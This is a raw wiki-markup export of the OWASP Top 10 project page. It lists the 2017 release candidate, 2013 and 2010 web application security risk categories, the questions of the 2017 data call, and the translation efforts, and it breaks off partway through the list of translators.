   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Efforts are already underway to translate the OWASP Top 10 for 2017. NOTE: This is still a '''release candidate''' so will definitely change before it's final. To avoid rework, you might want to wait until the final is released.If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please let me know you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint]. Please use this document as the basis for your translation efforts. &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
